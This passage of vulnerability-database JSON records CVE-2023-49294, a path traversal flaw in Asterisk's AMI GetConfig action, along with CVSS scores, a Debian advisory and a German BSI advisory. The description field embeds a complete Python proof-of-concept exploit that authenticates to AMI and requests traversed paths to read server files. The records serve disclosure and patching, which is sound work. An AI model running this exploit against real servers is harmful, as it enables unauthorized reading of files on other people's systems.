            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "security-advisories@github.com",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 1.2,
            "id": "CVE-2023-49294",
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-49294",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "nvd@nist.gov",
            "id": "CVE-2023-49294",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "security-advisories@github.com",
            "id": "CVE-2023-49294",
            "trust": 1.0,
            "value": "MEDIUM"
          },
          {
            "author": "NVD",
            "id": "CVE-2023-49294",
            "trust": 0.8,
            "value": "High"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue. Digium of Asterisk Path traversal vulnerabilities exist in products from multiple vendors.Information may be obtained. # Exploit Title: Asterisk AMI - Partial File Content \u0026 Path Disclosure (Authenticated)\n# Date: 2023-03-26\n# Exploit Author: Sean Pesce\n# Vendor Homepage: https://asterisk.org/\n# Software Link: https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/\n# Version: 18.20.0\n# Tested on: Debian Linux\n# CVE: CVE-2023-49294\n\n#!/usr/bin/env python3\n#\n# Proof of concept exploit for CVE-2023-49294, an authenticated vulnerability in Asterisk AMI that\n# facilitates filesystem enumeration (discovery of existing file paths) and limited disclosure of\n# file contents. Disclosed files must adhere to the Asterisk configuration format, which is similar\n# to the common INI configuration format. \n#\n# References:\n#   https://nvd.nist.gov/vuln/detail/CVE-2023-49294\n#   https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f\n#   https://docs.asterisk.org/Asterisk_18_Documentation/API_Documentation/AMI_Actions/GetConfig/\n\n\nimport argparse\nimport getpass\nimport socket\nimport sys\n\n\nCVE_ID = \u0027CVE-2023-49294\u0027\n\nDEFAULT_PORT = 5038\nDEFAULT_FILE = \u0027/etc/hosts\u0027\nDEFAULT_ACTION_ID = 0\nDEFAULT_TCP_READ_SZ = 1048576  # 1MB\n\n\n\ndef ami_msg(action, args, encoding=\u0027utf8\u0027):\n    assert type(action) == str, f\u0027Invalid type for AMI Action (expected string): {type(action)}\u0027\n    assert type(args) == dict, f\u0027Invalid type for AMI arguments (expected dict): {type(args)}\u0027\n    if \u0027ActionID\u0027 not in args:\n        args[\u0027ActionID\u0027] = 0\n    line_sep = \u0027\\r\\n\u0027\n    data = f\u0027Action: {action}{line_sep}\u0027\n    for a in args:\n        data += f\u0027{a}: {args[a]}{line_sep}\u0027\n    data += line_sep\n    return data.encode(encoding)\n\n\n\ndef tcp_send_rcv(sock, data, read_sz=DEFAULT_TCP_READ_SZ):\n    assert type(data) in (bytes, bytearray, memoryview), f\u0027Invalid data type (expected bytes): {type(data)}\u0027\n    sock.sendall(data)\n    resp = b\u0027\u0027\n    while not resp.endswith(b\u0027\\r\\n\\r\\n\u0027):\n        resp += sock.recv(read_sz)\n    return resp\n\n\n\nif __name__ == \u0027__main__\u0027:\n    # Parse command-line arguments\n    argparser = argparse.ArgumentParser()\n    argparser.add_argument(\u0027host\u0027, type=str, help=\u0027The host name or IP address of the Asterisk AMI server\u0027)\n    argparser.add_argument(\u0027-p\u0027, \u0027--port\u0027, type=int, help=f\u0027Asterisk AMI TCP port (default: {DEFAULT_PORT})\u0027, default=DEFAULT_PORT)\n    argparser.add_argument(\u0027-u\u0027, \u0027--user\u0027, type=str, help=f\u0027Asterisk AMI user\u0027, required=True)\n    argparser.add_argument(\u0027-P\u0027, \u0027--password\u0027, type=str, help=f\u0027Asterisk AMI secret\u0027, default=None)\n    argparser.add_argument(\u0027-f\u0027, \u0027--file\u0027, type=str, help=f\u0027File to read (default: {DEFAULT_FILE})\u0027, default=DEFAULT_FILE)\n    argparser.add_argument(\u0027-a\u0027, \u0027--action-id\u0027, type=int, help=f\u0027Action ID (default: {DEFAULT_ACTION_ID})\u0027, default=DEFAULT_ACTION_ID)\n    if \u0027-h\u0027 in sys.argv or \u0027--help\u0027 in sys.argv:\n        print(f\u0027Proof of concept exploit for {CVE_ID} in Asterisk AMI. More information here: \\nhttps://nvd.nist.gov/vuln/detail/{CVE_ID}\\n\u0027, file=sys.stderr)\n        argparser.print_help()\n        sys.exit(0)\n    args = argparser.parse_args()\n\n    # Validate command-line arguments\n    assert 1 \u003c= args.port \u003c= 65535, f\u0027Invalid port number: {args.port}\u0027\n    args.host = socket.gethostbyname(args.host)\n    if args.password is None:\n        args.password = getpass.getpass(f\u0027[PROMPT] Enter the AMI password for {args.user}: \u0027)\n\n    print(f\u0027[INFO] Proof of concept exploit for {CVE_ID}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Connecting to Asterisk AMI:  {args.user}@{args.host}:{args.port}\u0027, file=sys.stderr)\n\n    # Connect to the Asterisk AMI server\n    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n    sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n    sock.connect((args.host, args.port))\n\n    # Read server banner\n    banner = sock.recv(DEFAULT_TCP_READ_SZ)\n    print(f\u0027[INFO] Connected to {banner.decode(\"utf8\").strip()}\u0027, file=sys.stderr)\n\n    # Authenticate to the Asterisk AMI server\n    login_msg = ami_msg(\u0027Login\u0027, {\u0027Username\u0027:args.user,\u0027Secret\u0027:args.password})\n    login_resp = tcp_send_rcv(sock, login_msg)\n    while b\u0027Authentication\u0027 not in login_resp:\n        login_resp = tcp_send_rcv(sock, b\u0027\u0027)\n    if b\u0027Authentication accepted\u0027 not in login_resp:\n        print(f\u0027\\n[ERROR] Invalid credentials: \\n{login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n        sys.exit(1)\n    #print(f\u0027[INFO] Authenticated: {login_resp.decode(\"utf8\")}\u0027, file=sys.stderr)\n    print(f\u0027[INFO] Login success\u0027, file=sys.stderr)\n\n    # Obtain file data via path traversal\n    traversal = \u0027../../../../../../../../\u0027\n    cfg_msg = ami_msg(\u0027GetConfig\u0027, {\n        \u0027ActionID\u0027: args.action_id,\n        \u0027Filename\u0027: f\u0027{traversal}{args.file}\u0027,\n        #\u0027Category\u0027: \u0027default\u0027,\n        #\u0027Filter\u0027: \u0027name_regex=value_regex,\u0027,\n    })\n    resp = tcp_send_rcv(sock, cfg_msg)\n    while b\u0027Response\u0027 not in resp:\n        resp = tcp_send_rcv(sock, b\u0027\u0027)\n\n    print(f\u0027\u0027, file=sys.stderr)\n    print(f\u0027{resp.decode(\"utf8\")}\u0027)\n\n    if b\u0027Error\u0027 in resp:\n        sys.exit(1)\n\n    pass  # Done\n            \n\n. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n- -------------------------------------------------------------------------\nDebian Security Advisory DSA-5596-1                   security@debian.org\nhttps://www.debian.org/security/                          Markus Koschany\nJanuary 04, 2024                      https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage        : asterisk\nCVE ID         : CVE-2023-37457 CVE-2023-38703 CVE-2023-49294 CVE-2023-49786\nDebian Bug     : 1059303 1059032 1059033\n\nMultiple security vulnerabilities have been discovered in Asterisk, an Open\nSource Private Branch Exchange. \n\nCVE-2023-37457\n\n    The \u0027update\u0027 functionality of the PJSIP_HEADER dialplan function can exceed\n    the available buffer space for storing the new value of a header. By doing\n    so this can overwrite memory or cause a crash. This is not externally\n    exploitable, unless dialplan is explicitly written to update a header based\n    on data from an outside source. If the \u0027update\u0027 functionality is not used\n    the vulnerability does not occur. \n\nCVE-2023-38703\n\n    PJSIP is a free and open source multimedia communication library written in\n    C with high level API in C, C++, Java, C#, and Python languages. SRTP is a\n    higher level media transport which is stacked upon a lower level media\n    transport such as UDP and ICE. Currently a higher level transport is not\n    synchronized with its lower level transport that may introduce a\n    use-after-free issue. This vulnerability affects applications that have\n    SRTP capability (`PJMEDIA_HAS_SRTP` is set) and use underlying media\n    transport other than UDP. This vulnerability\u2019s impact may range from\n    unexpected application termination to control flow hijack/memory\n    corruption. \n\nCVE-2023-49786\n\n   Asterisk is susceptible to a DoS due to a race condition in the hello\n   handshake phase of the DTLS protocol when handling DTLS-SRTP for media\n   setup. This attack can be done continuously, thus denying new DTLS-SRTP\n   encrypted calls during the attack. Abuse of this vulnerability may lead to\n   a massive Denial of Service on vulnerable Asterisk servers for calls that\n   rely on DTLS-SRTP. \n\n\nFor the oldstable distribution (bullseye), these problems have been fixed\nin version 1:16.28.0~dfsg-0+deb11u4. \n\nWe recommend that you upgrade your asterisk packages. \n\nFor the detailed security status of asterisk please refer to\nits security tracker page at:\nhttps://security-tracker.debian.org/tracker/asterisk\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n-----BEGIN PGP SIGNATURE-----\n\niQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmWXIDJfFIAAAAAALgAo\naXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD\nRjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7\nUeRqthAA0ZarRHMpoNwTCAiVuVzcNqGVls/XvEvDbw1DNgjeKptlm4qafmVxHd6F\nJtloc8zD2w0sOCZCSbATZDosXlFCkAj09aI6oSfJOLBlqRDFVNhPn1Y4a1xOgAfl\nAZyn458v3TqlNFcZjJ89qHHociZ+fDfMUYpMsp/v9A4AOQjKn7AKYJ7aaL5PHR8b\nzejn2pP/8Hv592K4+xa5h/6a0AaXX0eOTlxZDFh7x93oP+op0k4v1J7ivP+Qs4wk\nT5iOqs6JrMc640ZprXB3c8HjapZt4ee5+Yp7An3Z7o/r9crXqT/6ocIRPmkomXVb\nbhZXSfEs5BmzkdWSnOBigSWthSp9umPKWWV9wUwSe1115XxhT43J7oBix9gkNCEu\nmN5Po/yaZQUDEtWx1DpVZtI3TNBwyv28f2XoUy72oq0WqEvBGC8hLDMXqjVWxhRh\nbRXfairiS/pfx2h4eIT5xUKX7xUUCEcGpZ2hIEgGGlS8TX2le+mWa+ipKNPYrBWJ\nQvg+MJ2JD9O3jMMS85y7ISuWUDNSeIDUSa0E48QWExZd8tmuknyDgPx5i4/nDVC+\nsxH1LnEgbUjLLfCCF0CZgbYebiEmUqyfvOSaJ3olekrxkje2WwVY+uJ4NJXBycPU\n+k3Db3c/h/zoYJ9A3ZKz/xu5L32grES2FMxdBDFeF/5VloO4/dg=N8+A\n-----END PGP SIGNATURE-----\n",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      }
    ],
    "trust": 1.8
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-49294",
        "trust": 2.8
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239",
        "trust": 0.8
      },
      {
        "db": "PACKETSTORM",
        "id": "177819",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "176383",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "id": "VAR-202312-2340",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.75
  },
  "last_update_date": "2024-08-14T14:30:07.750000Z",
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [ others ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.9,
        "url": "https://github.com/asterisk/asterisk/security/advisories/ghsa-8857-hfmw-vg8f"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/blob/master/main/manager.c#l3757"
      },
      {
        "trust": 1.8,
        "url": "https://github.com/asterisk/asterisk/commit/424be345639d75c6cb7d0bd2da5f0f407dbd0bd5"
      },
      {
        "trust": 1.8,
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "trust": 1.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49294"
      },
      {
        "trust": 0.1,
        "url": "https://downloads.asterisk.org/pub/telephony/asterisk/old-releases/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/{cve_id}\\n\u0027,"
      },
      {
        "trust": 0.1,
        "url": "https://asterisk.org/"
      },
      {
        "trust": 0.1,
        "url": "https://docs.asterisk.org/asterisk_18_documentation/api_documentation/ami_actions/getconfig/"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-38703"
      },
      {
        "trust": 0.1,
        "url": "https://www.debian.org/security/faq"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/asterisk"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-49786"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-37457"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2024-03-28T14:16:21",
        "db": "PACKETSTORM",
        "id": "177819"
      },
      {
        "date": "2024-01-05T14:31:02",
        "db": "PACKETSTORM",
        "id": "176383"
      },
      {
        "date": "2023-12-14T20:15:52.730000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2024-01-16T02:49:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      },
      {
        "date": "2023-12-29T00:15:49.930000",
        "db": "NVD",
        "id": "CVE-2023-49294"
      }
    ]
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Digium\u00a0 of \u00a0Asterisk\u00a0 Path traversal vulnerabilities in products from multiple vendors such as",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-020239"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "info disclosure",
    "sources": [
      {
        "db": "PACKETSTORM",
        "id": "177819"
      }
    ],
    "trust": 0.1
  }
}

wid-sec-w-2023-3158

Vulnerability from csaf_certbund

Published

2023-12-14 23:00

Modified

2024-01-04 23:00

Summary

Digium Certified Asterisk: Mehrere Schwachstellen

Notes

Das BSI ist als Anbieter für die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch dafür verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgfältig im Einzelfall zu prüfen.

Produktbeschreibung

Certified Asterisk ist eine komplette Multiprotokoll Telefonanlage (PBX) auf Softwarebasis mit erweitertem Support. Asterisk ist eine komplette Open Source Multiprotokoll Telefonanlage (PBX) auf Softwarebasis.

Angriff

Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Digium Certified Asterisk und Asterisk ausnutzen, um einen Denial of Service Angriff durchzuführen oder Informationen offenzulegen.

Betroffene Betriebssysteme

- UNIX - Linux - Windows - Sonstiges

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "text": "mittel"
    },
    "category": "csaf_base",
    "csaf_version": "2.0",
    "distribution": {
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "de-DE",
    "notes": [
      {
        "category": "legal_disclaimer",
        "text": "Das BSI ist als Anbieter f\u00fcr die eigenen, zur Nutzung bereitgestellten Inhalte nach den allgemeinen Gesetzen verantwortlich. Nutzerinnen und Nutzer sind jedoch daf\u00fcr verantwortlich, die Verwendung und/oder die Umsetzung der mit den Inhalten bereitgestellten Informationen sorgf\u00e4ltig im Einzelfall zu pr\u00fcfen."
      },
      {
        "category": "description",
        "text": "Certified Asterisk ist eine komplette Multiprotokoll Telefonanlage (PBX) auf Softwarebasis mit erweitertem Support.\r\nAsterisk ist eine komplette Open Source Multiprotokoll Telefonanlage (PBX) auf Softwarebasis.",
        "title": "Produktbeschreibung"
      },
      {
        "category": "summary",
        "text": "Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Digium Certified Asterisk und Asterisk ausnutzen, um einen Denial of Service Angriff durchzuf\u00fchren oder Informationen offenzulegen.",
        "title": "Angriff"
      },
      {
        "category": "general",
        "text": "- UNIX\n- Linux\n- Windows\n- Sonstiges",
        "title": "Betroffene Betriebssysteme"
      }
    ],
    "publisher": {
      "category": "other",
      "contact_details": "csaf-provider@cert-bund.de",
      "name": "Bundesamt f\u00fcr Sicherheit in der Informationstechnik",
      "namespace": "https://www.bsi.bund.de"
    },
    "references": [
      {
        "category": "self",
        "summary": "WID-SEC-W-2023-3158 - CSAF Version",
        "url": "https://wid.cert-bund.de/.well-known/csaf/white/2023/wid-sec-w-2023-3158.json"
      },
      {
        "category": "self",
        "summary": "WID-SEC-2023-3158 - Portal Version",
        "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2023-3158"
      },
      {
        "category": "external",
        "summary": "RedHat Bugzilla vom 2023-12-14",
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2254625"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-98rc-4j27-74hh"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-8857-hfmw-vg8f"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-hxj9-xwr8-w8pq"
      },
      {
        "category": "external",
        "summary": "GitHub Asterisk vom 2023-12-14",
        "url": "https://github.com/asterisk/asterisk/security/advisories/GHSA-5743-x3p5-3rg7"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DLA-3696 vom 2023-12-29",
        "url": "https://lists.debian.org/debian-lts-announce/2023/12/msg00019.html"
      },
      {
        "category": "external",
        "summary": "Debian Security Advisory DSA-5596 vom 2024-01-04",
        "url": "https://lists.debian.org/debian-security-announce/2024/msg00003.html"
      }
    ],
    "source_lang": "en-US",
    "title": "Digium Certified Asterisk: Mehrere Schwachstellen",
    "tracking": {
      "current_release_date": "2024-01-04T23:00:00.000+00:00",
      "generator": {
        "date": "2024-08-15T18:02:51.767+00:00",
        "engine": {
          "name": "BSI-WID",
          "version": "1.3.5"
        }
      },
      "id": "WID-SEC-W-2023-3158",
      "initial_release_date": "2023-12-14T23:00:00.000+00:00",
      "revision_history": [
        {
          "date": "2023-12-14T23:00:00.000+00:00",
          "number": "1",
          "summary": "Initiale Fassung"
        },
        {
          "date": "2023-12-19T23:00:00.000+00:00",
          "number": "2",
          "summary": "Link erg\u00e4nzt"
        },
        {
          "date": "2023-12-28T23:00:00.000+00:00",
          "number": "3",
          "summary": "Neue Updates von Debian aufgenommen"
        },
        {
          "date": "2024-01-04T23:00:00.000+00:00",
          "number": "4",
          "summary": "Neue Updates von Debian aufgenommen"
        }
      ],
      "status": "final",
      "version": "4"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "category": "product_name",
            "name": "Debian Linux",
            "product": {
              "name": "Debian Linux",
              "product_id": "2951",
              "product_identification_helper": {
                "cpe": "cpe:/o:debian:debian_linux:-"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Debian"
      },
      {
        "branches": [
          {
            "category": "product_name",
            "name": "Digium Certified Asterisk \u003c 18.9-cert6",
            "product": {
              "name": "Digium Certified Asterisk \u003c 18.9-cert6",
              "product_id": "T031720",
              "product_identification_helper": {
                "cpe": "cpe:/a:digium:certified_asterisk:18.9-cert6"
              }
            }
          }
        ],
        "category": "vendor",
        "name": "Digium"
      },
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Open Source Asterisk \u003c 18.20.1",
                "product": {
                  "name": "Open Source Asterisk \u003c 18.20.1",
                  "product_id": "T031721",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:18.20.1"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Open Source Asterisk \u003c 20.5.1",
                "product": {
                  "name": "Open Source Asterisk \u003c 20.5.1",
                  "product_id": "T031722",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:20.5.1"
                  }
                }
              },
              {
                "category": "product_name",
                "name": "Open Source Asterisk \u003c 21.0.1",
                "product": {
                  "name": "Open Source Asterisk \u003c 21.0.1",
                  "product_id": "T031723",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:digium:asterisk:21.0.1"
                  }
                }
              }
            ],
            "category": "product_name",
            "name": "Asterisk"
          }
        ],
        "category": "vendor",
        "name": "Open Source"
      }
    ]
  },
  "vulnerabilities": [
    {
      "cve": "CVE-2023-37457",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Die \u0027Update\u0027-Funktionalit\u00e4t der Dialplan-Funktion PJSIP_HEADER kann den verf\u00fcgbaren Pufferplatz f\u00fcr die Speicherung des neuen Wertes eines Headers \u00fcberschreiten. Ein Angreifer kann diese Schwachstelle ausnutzen, um einen Denial of Service zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "2951"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-37457"
    },
    {
      "cve": "CVE-2023-49294",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. Ein Path Traversal Problem in AMI GetConfig erm\u00f6glicht Zugriff auf externe Dateien. Ein privilegierter Angreifer kann diese Schwachstelle ausnutzen, um Informationen offenzulegen."
        }
      ],
      "product_status": {
        "known_affected": [
          "2951"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-49294"
    },
    {
      "cve": "CVE-2023-49786",
      "notes": [
        {
          "category": "description",
          "text": "Es existiert eine Schwachstelle in Digium Certified Asterisk und Asterisk. W\u00e4hrend des Rufaufbaus kommt es in der Hello-Handshake-Phase des DTLS-Protokolls zu einer Race-Condition. Ein entfernter, anonymer Angreifer kann diese Schwachstelle mit speziell bearbeiteten DTLS Hello-Paketen ausnutzen, um einen Denial of Service zu verursachen."
        }
      ],
      "product_status": {
        "known_affected": [
          "2951"
        ]
      },
      "release_date": "2023-12-14T23:00:00.000+00:00",
      "title": "CVE-2023-49786"
    }
  ]
}

gsd-2023-49294

Vulnerability from gsd

Modified

2023-12-13 01:20

Details

Aliases

CVE-2023-49294

Aliases

CVE-2023-49294

JSON

To clipboard

{
  "GSD": {
    "alias": "CVE-2023-49294",
    "id": "GSD-2023-49294"
  },
  "gsd": {
    "metadata": {
      "exploitCode": "unknown",
      "remediation": "unknown",
      "reportConfidence": "confirmed",
      "type": "vulnerability"
    },
    "osvSchema": {
      "aliases": [
        "CVE-2023-49294"
      ],
      "details": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue.",
      "id": "GSD-2023-49294",
      "modified": "2023-12-13T01:20:35.204593Z",
      "schema_version": "1.4.0"
    }
  },
  "namespaces": {
    "cve.org": {
      "CVE_data_meta": {
        "ASSIGNER": "security-advisories@github.com",
        "ID": "CVE-2023-49294",
        "STATE": "PUBLIC"
      },
      "affects": {
        "vendor": {
          "vendor_data": [
            {
              "product": {
                "product_data": [
                  {
                    "product_name": "asterisk",
                    "version": {
                      "version_data": [
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 18.20.1"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003e= 19.0.0, \u003c 20.5.1"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "= 21.0.0"
                        },
                        {
                          "version_affected": "=",
                          "version_value": "\u003c 18.9-cert6"
                        }
                      ]
                    }
                  }
                ]
              },
              "vendor_name": "asterisk"
            }
          ]
        }
      },
      "data_format": "MITRE",
      "data_type": "CVE",
      "data_version": "4.0",
      "description": {
        "description_data": [
          {
            "lang": "eng",
            "value": "Asterisk is an open source private branch exchange and telephony toolkit. In Asterisk prior to versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, it is possible to read any arbitrary file even when the `live_dangerously` is not enabled. This allows arbitrary files to be read. Asterisk versions 18.20.1, 20.5.1, and 21.0.1, as well as certified-asterisk prior to 18.9-cert6, contain a fix for this issue."
          }
        ]
      },
      "impact": {
        "cvss": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.9,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
